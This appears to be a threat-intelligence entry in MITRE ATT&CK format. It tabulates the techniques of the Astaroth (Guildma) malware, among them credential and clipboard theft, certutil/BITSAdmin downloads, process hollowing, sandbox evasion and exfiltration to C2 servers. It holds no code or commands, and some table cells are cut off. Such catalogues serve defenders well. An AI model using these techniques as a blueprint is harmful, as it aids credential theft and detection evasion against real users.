Name | Description |
---|---|
Guildma |
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | |
.009 | Boot or Logon Autostart Execution: Shortcut Modification | |||
Enterprise | T1115 | Clipboard Data |
Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. [1] |
|
Enterprise | T1059 | .003 | Command and Scripting Interpreter: Windows Command Shell | |
.005 | Command and Scripting Interpreter: Visual Basic |
Astaroth has used malicious VBS e-mail attachments for execution.[3] |
||
.007 | Command and Scripting Interpreter: JavaScript |
Astaroth uses JavaScript to perform its core functionalities. [2][3] |
||
Enterprise | T1555 | Credentials from Password Stores |
Astaroth uses an external software known as NetPass to recover passwords. [1] |
|
Enterprise | T1132 | .001 | Data Encoding: Standard Encoding |
Astaroth encodes data using Base64 before sending it to the C2 server. [2] |
Enterprise | T1074 | .001 | Data Staged: Local Data Staging |
Astaroth collects data in a plaintext file named r1.log before exfiltration. [2] |
Enterprise | T1140 | Deobfuscate/Decode Files or Information |
Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. [1][3] |
|
Enterprise | T1568 | .002 | Dynamic Resolution: Domain Generation Algorithms | |
Enterprise | T1041 | Exfiltration Over C2 Channel |
Astaroth exfiltrates collected information from its r1.log file to the external C2 server. [1] |
|
Enterprise | T1564 | .003 | Hide Artifacts: Hidden Window |
Astaroth loads its module with the XSL script parameter |
.004 | Hide Artifacts: NTFS File Attributes |
Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads.[3] |
||
Enterprise | T1574 | .001 | Hijack Execution Flow: DLL Search Order Hijacking |
Astaroth can launch itself via DLL Search Order Hijacking.[3] |
Enterprise | T1105 | Ingress Tool Transfer |
Astaroth uses certutil and BITSAdmin to download additional malware. [2][1][3] |
|
Enterprise | T1056 | .001 | Input Capture: Keylogging | |
Enterprise | T1027 | Obfuscated Files or Information |
Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.[1][3] |
|
.002 | Software Packing |
Astaroth uses a software packer called Pe123\RPolyCryptor.[1] |
||
Enterprise | T1598 | .002 | Phishing for Information: Spearphishing Attachment |
Astaroth has been delivered via malicious e-mail attachments.[3] |
Enterprise | T1057 | Process Discovery | ||
Enterprise | T1055 | .012 | Process Injection: Process Hollowing |
Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.[1][3] |
Enterprise | T1129 | Shared Modules |
Astaroth uses the LoadLibraryExW() function to load additional modules. [1] |
|
Enterprise | T1218 | .001 | Signed Binary Proxy Execution: Compiled HTML File |
Astaroth uses ActiveX objects for file execution and manipulation. [2] |
.010 | Signed Binary Proxy Execution: Regsvr32 | |||
Enterprise | T1518 | .001 | Software Discovery: Security Software Discovery |
Astaroth checks for the presence of Avast antivirus in the |
Enterprise | T1082 | System Information Discovery |
Astaroth collects the machine name and keyboard language from the system. [2][1] |
|
Enterprise | T1016 | System Network Configuration Discovery |
Astaroth collects the external IP address from the system. [2] |
|
Enterprise | T1124 | System Time Discovery |
Astaroth collects the timestamp from the infected machine. [2] |
|
Enterprise | T1552 | Unsecured Credentials |
Astaroth uses an external software known as NetPass to recover passwords. [1] |
|
Enterprise | T1204 | .002 | User Execution: Malicious File |
Astaroth has used malicious files including VBS, LNK, and HTML for execution.[3] |
Enterprise | T1497 | .001 | Virtualization/Sandbox Evasion: System Checks |
Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.[3] |
Enterprise | T1102 | .001 | Web Service: Dead Drop Resolver |
Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.[3] |
Enterprise | T1047 | Windows Management Instrumentation | ||
Enterprise | T1220 | XSL Script Processing |
Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. [1] |